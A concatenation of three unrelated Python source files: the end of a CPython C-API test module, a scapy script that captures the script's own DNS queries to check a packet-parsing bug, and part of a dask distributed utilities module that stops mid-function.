self.assertEqual(pynumber_tobase(-123, 2), '-0b1111011')
self.assertEqual(pynumber_tobase(-123, 8), '-0o173')
self.assertEqual(pynumber_tobase(-123, 10), '-123')
self.assertEqual(pynumber_tobase(-123, 16), '-0x7b')
self.assertRaises(TypeError, pynumber_tobase, 123.0, 10)
self.assertRaises(TypeError, pynumber_tobase, '123', 10)
self.assertRaises(SystemError, pynumber_tobase, 123, 0)
def check_fatal_error(self, code, expected, not_expected=()):
with support.SuppressCrashReport():
rc, out, err = assert_python_failure('-sSI', '-c', code)
err = decode_stderr(err)
self.assertIn('Fatal Python error: test_fatal_error: MESSAGE\n',
err)
match = re.search(r'^Extension modules:(.*) \(total: ([0-9]+)\)$',
err, re.MULTILINE)
if not match:
self.fail(f"Cannot find 'Extension modules:' in {err!r}")
modules = set(match.group(1).strip().split(', '))
total = int(match.group(2))
for name in expected:
self.assertIn(name, modules)
for name in not_expected:
self.assertNotIn(name, modules)
self.assertEqual(len(modules), total)
@support.requires_subprocess()
def test_fatal_error(self):
# By default, stdlib extension modules are ignored,
# but not test modules.
expected = ('_testcapi',)
not_expected = ('sys',)
code = 'import _testcapi, sys; _testcapi.fatal_error(b"MESSAGE")'
self.check_fatal_error(code, expected, not_expected)
# Mark _testcapi as stdlib module, but not sys
expected = ('sys',)
not_expected = ('_testcapi',)
code = textwrap.dedent('''
import _testcapi, sys
sys.stdlib_module_names = frozenset({"_testcapi"})
_testcapi.fatal_error(b"MESSAGE")
''')
self.check_fatal_error(code, expected)
def test_pyobject_repr_from_null(self):
s = _testcapi.pyobject_repr_from_null()
self.assertEqual(s, '<NULL>')
def test_pyobject_str_from_null(self):
s = _testcapi.pyobject_str_from_null()
self.assertEqual(s, '<NULL>')
def test_pyobject_bytes_from_null(self):
s = _testcapi.pyobject_bytes_from_null()
self.assertEqual(s, b'<NULL>')
def test_Py_CompileString(self):
# Check that Py_CompileString respects the coding cookie
_compile = _testcapi.Py_CompileString
code = b"# -*- coding: latin1 -*-\nprint('\xc2\xa4')\n"
result = _compile(code)
expected = compile(code, "<string>", "exec")
self.assertEqual(result.co_consts, expected.co_consts)
def test_export_symbols(self):
# bpo-44133: Ensure that the "Py_FrozenMain" and
# "PyThread_get_thread_native_id" symbols are exported by the Python
# (directly by the binary, or via by the Python dynamic library).
ctypes = import_helper.import_module('ctypes')
names = []
# Test if the PY_HAVE_THREAD_NATIVE_ID macro is defined
if hasattr(_thread, 'get_native_id'):
names.append('PyThread_get_thread_native_id')
# Python/frozenmain.c fails to build on Windows when the symbols are
# missing:
# - PyWinFreeze_ExeInit
# - PyWinFreeze_ExeTerm
# - PyInitFrozenExtensions
if os.name != 'nt':
names.append('Py_FrozenMain')
for name in names:
with self.subTest(name=name):
self.assertTrue(hasattr(ctypes.pythonapi, name))
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
@threading_helper.requires_working_threading()
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with threading_helper.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
def test_subinterps_recent_language_features(self):
r, w = os.pipe()
code = """if 1:
import pickle
with open({:d}, "wb") as f:
@(lambda x:x) # Py 3.9
def noop(x): return x
a = (b := f'1{{2}}3') + noop('x') # Py 3.8 (:=) / 3.6 (f'')
async def foo(arg): return await arg # Py 3.5
pickle.dump(dict(a=a, b=b), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertEqual(pickle.load(f), {'a': '123x', 'b': '123'})
def test_mutate_exception(self):
"""
Exceptions saved in global module state get shared between
individual module instances. This test checks whether or not
a change in one interpreter's module gets reflected into the
other ones.
"""
import binascii
support.run_in_subinterp("import binascii; binascii.Error.foobar = 'foobar'")
self.assertFalse(hasattr(binascii.Error, "foobar"))
@unittest.skipIf(_testmultiphase is None, "test requires _testmultiphase module")
def test_module_state_shared_in_global(self):
"""
bpo-44050: Extension module state should be shared between interpreters
when it doesn't support sub-interpreters.
"""
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
script = textwrap.dedent(f"""
import importlib.machinery
import importlib.util
import os
fullname = '_test_module_state_shared'
origin = importlib.util.find_spec('_testmultiphase').origin
loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
spec = importlib.util.spec_from_loader(fullname, loader)
module = importlib.util.module_from_spec(spec)
attr_id = str(id(module.Error)).encode()
os.write({w}, attr_id)
""")
exec(script)
main_attr_id = os.read(r, 100)
ret = support.run_in_subinterp(script)
self.assertEqual(ret, 0)
subinterp_attr_id = os.read(r, 100)
self.assertEqual(main_attr_id, subinterp_attr_id)
class TestThreadState(unittest.TestCase):
@threading_helper.reap_threads
@threading_helper.requires_working_threading()
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
locals().update((name, getattr(_testcapi, name))
for name in dir(_testcapi)
if name.startswith('test_') and not name.endswith('_code'))
# Suppress warning from PyUnicode_FromUnicode().
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_widechar(self):
_testcapi.test_widechar()
def test_version_api_data(self):
self.assertEqual(_testcapi.Py_Version, sys.hexversion)
class Test_testinternalcapi(unittest.TestCase):
locals().update((name, getattr(_testinternalcapi, name))
for name in dir(_testinternalcapi)
if name.startswith('test_'))
@support.requires_subprocess()
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure(
'-c', code,
PYTHONMALLOC=self.PYTHONMALLOC,
# FreeBSD: instruct jemalloc to not fill freed() memory
# with junk byte 0x5a, see JEMALLOC(3)
MALLOC_CONF="junk:false",
)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfd\n"
r" at tail\+2: 0xfd\n"
r" .*\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: _PyMem_DebugMalloc: '
'Python memory allocator called without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
def check_pyobject_is_freed(self, func_name):
code = textwrap.dedent(f'''
import gc, os, sys, _testcapi
# Disable the GC to avoid crash on GC collection
gc.disable()
try:
_testcapi.{func_name}()
# Exit immediately to avoid a crash while deallocating
# the invalid object
os._exit(0)
except _testcapi.error:
os._exit(1)
''')
assert_python_ok(
'-c', code,
PYTHONMALLOC=self.PYTHONMALLOC,
MALLOC_CONF="junk:false",
)
def test_pyobject_null_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_null_is_freed')
def test_pyobject_uninitialized_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_uninitialized_is_freed')
def test_pyobject_forbidden_bytes_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_forbidden_bytes_is_freed')
def test_pyobject_freed_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_freed_is_freed')
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
@unittest.skipIf(_testmultiphase is None, "test requires _testmultiphase module")
class Test_ModuleStateAccess(unittest.TestCase):
"""Test access to module start (PEP 573)"""
# The C part of the tests lives in _testmultiphase, in a module called
# _testmultiphase_meth_state_access.
# This module has multi-phase initialization, unlike _testcapi.
def setUp(self):
fullname = '_testmultiphase_meth_state_access' # XXX
origin = importlib.util.find_spec('_testmultiphase').origin
loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
spec = importlib.util.spec_from_loader(fullname, loader)
module = importlib.util.module_from_spec(spec)
loader.exec_module(module)
self.module = module
def test_subclass_get_module(self):
"""PyType_GetModule for defining_class"""
class StateAccessType_Subclass(self.module.StateAccessType):
pass
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_subclass_get_module_with_super(self):
class StateAccessType_Subclass(self.module.StateAccessType):
def get_defining_module(self):
return super().get_defining_module()
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_state_access(self):
"""Checks methods defined with and without argument clinic
This tests a no-arg method (get_count) and a method with
both a positional and keyword argument.
"""
a = self.module.StateAccessType()
b = self.module.StateAccessType()
methods = {
'clinic': a.increment_count_clinic,
'noclinic': a.increment_count_noclinic,
}
for name, increment_count in methods.items():
with self.subTest(name):
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
increment_count()
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 1)
increment_count(3)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 4)
increment_count(-2, twice=True)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
with self.assertRaises(TypeError):
increment_count(thrice=3)
with self.assertRaises(TypeError):
increment_count(1, 2, 3)
def test_get_module_bad_def(self):
# PyType_GetModuleByDef fails gracefully if it doesn't
# find what it's looking for.
# see bpo-46433
instance = self.module.StateAccessType()
with self.assertRaises(TypeError):
instance.getmodulebydef_bad_def()
def test_get_module_static_in_mro(self):
# Here, the class PyType_GetModuleByDef is looking for
# appears in the MRO after a static type (Exception).
# see bpo-46433
class Subclass(BaseException, self.module.StateAccessType):
pass
self.assertIs(Subclass().get_defining_module(), self.module)
class Test_FrameAPI(unittest.TestCase):
def getframe(self):
return sys._getframe()
def getgenframe(self):
yield sys._getframe()
def test_frame_getters(self):
frame = self.getframe()
self.assertEqual(frame.f_locals, _testcapi.frame_getlocals(frame))
self.assertIs(frame.f_globals, _testcapi.frame_getglobals(frame))
self.assertIs(frame.f_builtins, _testcapi.frame_getbuiltins(frame))
self.assertEqual(frame.f_lasti, _testcapi.frame_getlasti(frame))
def test_frame_get_generator(self):
gen = self.getgenframe()
frame = next(gen)
self.assertIs(gen, _testcapi.frame_getgenerator(frame))
SUFFICIENT_TO_DEOPT_AND_SPECIALIZE = 100
class Test_Pep523API(unittest.TestCase):
def do_test(self, func):
calls = []
start = SUFFICIENT_TO_DEOPT_AND_SPECIALIZE
count = start + SUFFICIENT_TO_DEOPT_AND_SPECIALIZE
for i in range(count):
if i == start:
_testinternalcapi.set_eval_frame_record(calls)
func()
_testinternalcapi.set_eval_frame_default()
self.assertEqual(len(calls), SUFFICIENT_TO_DEOPT_AND_SPECIALIZE)
for name in calls:
self.assertEqual(name, func.__name__)
def test_pep523_with_specialization_simple(self):
def func1():
pass
self.do_test(func1)
def test_pep523_with_specialization_with_default(self):
def func2(x=None):
pass
self.do_test(func2)
if __name__ == "__main__":
unittest.main()
|
dns_test.py
|
#!/env/bin python
# ------------------------------------------------------------
# dns_test.py
# Exercise DNS requests using IPv4 and IPv6 transport
# and evaluate capture response and remdiation of SCAPY
# DNS packet bug.
# ------------------------------------------------------------
# references
# http://stackoverflow.com/questions/26433826/no-dns-layer-using-scapy-from-python-2-6
# https://bitbucket.org/secdev/scapy/issues/913/dns-responses-are-malformed-after
# https://bitbucket.org/secdev/scapy/pull-requests/18/implemented-phils-idea-to-solve-issue-913/diff
# https://en.wikipedia.org/wiki/IPv6_address
# ------------------------------------------------------------
from multiprocessing import Process
from scapy.all import sniff
from scapy.layers.inet import UDP, IP
from scapy.layers.dns import DNS
from scapy.utils import rdpcap, wrpcap
import time
import sys
import subprocess
def msg(txt):
sys.stderr.write(txt + "\n")
sys.stderr.flush()
def dig(four6):
msg("dig sleeping")
time.sleep(2)
if four6 == "4":
subprocess.call("dig -4 +time=1 +tries=1 @192.168.2.1 cnn.com".split(" "))
else:
subprocess.call("dig -6 +time=1 +tries=1 @192.168.2.1 cnn.com".split(" "))
time.sleep(2)
msg("dig done")
def parent(ip_version):
msg("============================================================")
msg("starting dig process USING IPv{}".format(ip_version))
p = Process(target=dig, args=(ip_version, ))
p.start()
msg("starting sniff")
pkts = sniff("eth0", lfilter=lambda x: (UDP in x and DNS in x), timeout=6)
msg("sniff done, joining dig")
p.join()
msg("\noriginal\n----------------------------------------")
pkts.nsummary()
msg("\nsave and reload 1\n----------------------------------------")
pktfile = "pkts2.pcap"
wrpcap(pktfile, pkts)
pkts2 = rdpcap(pktfile)
pkts2.nsummary()
msg("\nsave and reload 2\n----------------------------------------")
for p in pkts:
if IP in p:
del(p[IP].len)
if UDP in p:
del(p[UDP].len)
del(p[UDP].chksum)
pktfile = "pkts3.pcap"
wrpcap(pktfile, pkts)
pkts3 = rdpcap(pktfile)
pkts3.nsummary()
msg("----------------------------------------\n")
if __name__ == "__main__":
parent(4)
parent(6)
|
utils.py
|
from __future__ import print_function, division, absolute_import
import atexit
from collections import Iterable, deque
from contextlib import contextmanager
from datetime import timedelta
import functools
import json
import logging
import multiprocessing
from numbers import Number
import operator
import os
import re
import shutil
import socket
from time import sleep
from importlib import import_module
import sys
import tempfile
import threading
import warnings
import weakref
import six
import tblib.pickling_support
from .compatibility import cache_from_source, getargspec, invalidate_caches, reload
try:
import resource
except ImportError:
resource = None
import dask
from dask import istask
from toolz import memoize, valmap
import tornado
from tornado import gen
from tornado.ioloop import IOLoop, PollIOLoop
from .compatibility import Queue, PY3, PY2, get_thread_identity, unicode
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
logger = _logger = logging.getLogger(__name__)
no_default = '__no_default__'
def _initialize_mp_context():
if PY3 and not sys.platform.startswith('win') and 'PyPy' not in sys.version:
method = dask.config.get('distributed.worker.multiprocessing-method')
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ['distributed']
if 'pkg_resources' in sys.modules:
preload.append('pkg_resources')
ctx.set_forkserver_preload(preload)
else:
ctx = multiprocessing
return ctx
mp_context = _initialize_mp_context()
def funcname(func):
"""Get the name of a function."""
while hasattr(func, 'func'):
func = func.func
try:
return func.__name__
except AttributeError:
return str(func)
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in getargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@memoize
def _get_ip(host, port, family, default):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
# XXX Should first try getaddrinfo() on socket.gethostname() and getfqdn()
warnings.warn("Couldn't detect a suitable IP address for "
"reaching %r, defaulting to %r: %s"
% (host, default, e), RuntimeWarning)
return default
finally:
sock.close()
def get_ip(host='8.8.8.8', port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET, default='127.0.0.1')
def get_ipv6(host='2001:4860:4860::8888', port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6, default='::1')
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
ValueError is raised if the interface does no have an IPv4 address
associated with it.
"""
import psutil
for info in psutil.net_if_addrs()[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
@contextmanager
def ignoring(*exceptions):
try:
yield
except exceptions as e:
pass
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
""" Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with ignoring(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
@gen.coroutine
def All(*args):
""" Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
"""
if len(args) == 1 and isinstance(args[0], Iterable):
args = args[0]
tasks = gen.WaitIterator(*args)
results = [None for _ in args]
while not tasks.done():
result = yield tasks.next()
results[tasks.current_index] = result
raise gen.Return(results)
def sync(loop, func, *args, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
# Tornado's PollIOLoop doesn't raise when using closed, do it ourselves
if ((isinstance(loop, PollIOLoop) and getattr(loop, '_closing', False)) or
(hasattr(loop, 'asyncio_loop') and loop.asyncio_loop._closed)):
raise RuntimeError("IOLoop is closed")
timeout = kwargs.pop('callback_timeout', None)
def make_coro():
coro = gen.maybe_future(func(*args, **kwargs))
if timeout is None:
return coro
else:
return gen.with_timeout(timedelta(seconds=timeout), coro)
e = threading.Event()
main_tid = get_thread_identity()
result = [None]
error = [False]
@gen.coroutine
def f():
try:
if main_tid == get_thread_identity():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
thread_state.asynchronous = True
result[0] = yield make_coro()
except Exception as exc:
error[0] = sys.exc_info()
finally:
thread_state.asynchronous = False
e.set()
loop.add_callback(f)
if timeout is not None:
if not e.wait(timeout):
raise gen.TimeoutError("timed out after %s s." % (timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
six.reraise(*error[0])
else:
return result[0]
class LoopRunner(object):
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
self._should_close_loop = True
else:
self._loop = loop
self._should_close_loop = False
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if (self._asynchronous or real_runner is not None or count > 0):
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop,
name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=1000)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, 'w') as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
""" Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if 'IPython' not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), 'kernel', None) is not None
hex_pattern = re.compile('[a-f]+')
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split('-')
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (len(word) == 8 and
hex_pattern.match(word) is not None):
result += '-' + word
else:
break
if len(result) == 32 and re.match(r'[a-f0-9]{32}', result):
return 'data'
else:
if result[0] == '<':
result = result.strip('<>').split()[0].split('.')[-1]
return result
except Exception:
return 'Other'
try:
from functools import lru_cache
except ImportError:
pass
else:
key_split = lru_cache(100000)(key_split)
if PY3:
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x-1'
>>> key_split_group('x-1-2-3')
'x-1-2-3'
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('hello-world-1')
'hello-world-1'
>>> key_split_group(b'hello-world-1')
'hello-world-1'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group(None)
'Other'
>>> key_split_group('x-abcdefab') # ignores hex
'x-abcdefab'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == '(':
return x.split(',', 1)[0].strip('()"\'')
elif len(x) == 32 and re.match(r'[a-f0-9]{32}', x):
return 'data'
elif x[0] == '<':
return x.strip('<>').split()[0].split('.')[-1]
else:
return x
elif typ is bytes:
return key_split_group(x.decode())
else:
return 'Other'
else:
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x-1'
>>> key_split_group('x-1-2-3')
'x-1-2-3'
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('hello-world-1')
'hello-world-1'
>>> key_split_group(b'hello-world-1')
'hello-world-1'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group(None)
'Other'
>>> key_split_group('x-abcdefab') # ignores hex
'x-abcdefab'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str or typ is unicode:
if x[0] == '(':
return x.split(',', 1)[0].strip('()"\'')
elif len(x) == 32 and re.match(r'[a-f0-9]{32}', x):
return 'data'
elif x[0] == '<':
return x.strip('<>').split()[0].split('.')[-1]
else:
return x
else:
return 'Other'
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root='distributed'):
"""
Force all existing loggers below *root* to the given level at least
(or keep the existing level if less verbose).
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@memoize
def ensure_ip(hostname):
""" Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(hostname,
1234, # dummy port number
fam, socket.SOCK_STREAM)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
